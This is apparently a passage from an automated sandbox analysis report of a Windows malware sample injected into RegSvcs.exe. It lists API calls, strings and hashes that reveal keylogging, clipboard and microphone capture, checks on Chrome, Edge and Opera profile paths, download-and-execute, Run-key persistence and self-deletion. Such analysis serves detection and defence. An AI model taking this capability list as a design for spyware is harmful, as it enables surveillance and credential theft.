                                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                              • __Init_thread_footer.LIBCMT ref: 0040B797
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Init_thread_footer__onexit
                              • String ID: [End of clipboard]$[Text copied to clipboard]
                              • API String ID: 1881088180-3686566968
                              • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                              • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                              • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                              • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                              APIs
                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ACP$OCP
                              • API String ID: 0-711371036
                              • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                              • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                              • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                              • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                              APIs
                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 481472006-1507639952
                              • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                              • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                              • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                              • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                              APIs
                              • Sleep.KERNEL32 ref: 00416640
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DownloadFileSleep
                              • String ID: !D@
                              • API String ID: 1931167962-604454484
                              • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                              • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                              • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                              • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                              APIs
                              • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: | $%02i:%02i:%02i:%03i
                              • API String ID: 481472006-2430845779
                              • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                              • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                              • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                              • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: alarm.wav$hYG
                              • API String ID: 1174141254-2782910960
                              • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                              • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                              • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                              • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                              APIs
                                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • CloseHandle.KERNEL32(?), ref: 0040B0B4
                              • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                              • String ID: Online Keylogger Stopped
                              • API String ID: 1623830855-1496645233
                              • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                              • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                              • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                              • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                              APIs
                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferHeaderPrepare
                              • String ID: XMG
                              • API String ID: 2315374483-813777761
                              • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                              • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                              APIs
                              • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$JD
                              • API String ID: 1901932003-2234456777
                              • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                              • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                              • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                              • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                              • API String ID: 1174141254-4188645398
                              • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                              • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                              • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                              • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                              • API String ID: 1174141254-2800177040
                              • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                              • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                              • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                              • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: AppData$\Opera Software\Opera Stable\
                              • API String ID: 1174141254-1629609700
                              • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                              • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                              • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                              • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                              APIs
                              • GetKeyState.USER32(00000011), ref: 0040B64B
                                • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                              • String ID: [AltL]$[AltR]
                              • API String ID: 2738857842-2658077756
                              • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                              • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                              • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                              • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                              APIs
                              • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                              • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: uD
                              • API String ID: 0-2547262877
                              • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                              • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                              • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                              • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: !D@$open
                              • API String ID: 587946157-1586967515
                              • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                              • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                              • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                              • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                              APIs
                              • GetKeyState.USER32(00000012), ref: 0040B6A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: State
                              • String ID: [CtrlL]$[CtrlR]
                              • API String ID: 1649606143-2446555240
                              • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                              • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                              • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                              • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                              APIs
                                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                              • __Init_thread_footer.LIBCMT ref: 00410F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Init_thread_footer__onexit
                              • String ID: ,kG$0kG
                              • API String ID: 1881088180-2015055088
                              • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                              • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                              • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                              • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                              • API String ID: 2654517830-1051519024
                              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                              • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                              • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                              APIs
                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteDirectoryFileRemove
                              • String ID: pth_unenc
                              • API String ID: 3325800564-4028850238
                              • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                              • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                              • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                              • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                              APIs
                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ObjectProcessSingleTerminateWait
                              • String ID: pth_unenc
                              • API String ID: 1872346434-4028850238
                              • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                              • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                              • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                              • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                              • GetLastError.KERNEL32 ref: 00440D35
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast
                              • String ID:
                              • API String ID: 1717984340-0
                              • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                              • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                              • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                              • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                              APIs
                              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                              • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                              • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastRead
                              • String ID:
                              • API String ID: 4100373531-0
                              • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                              • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                              • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                              • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99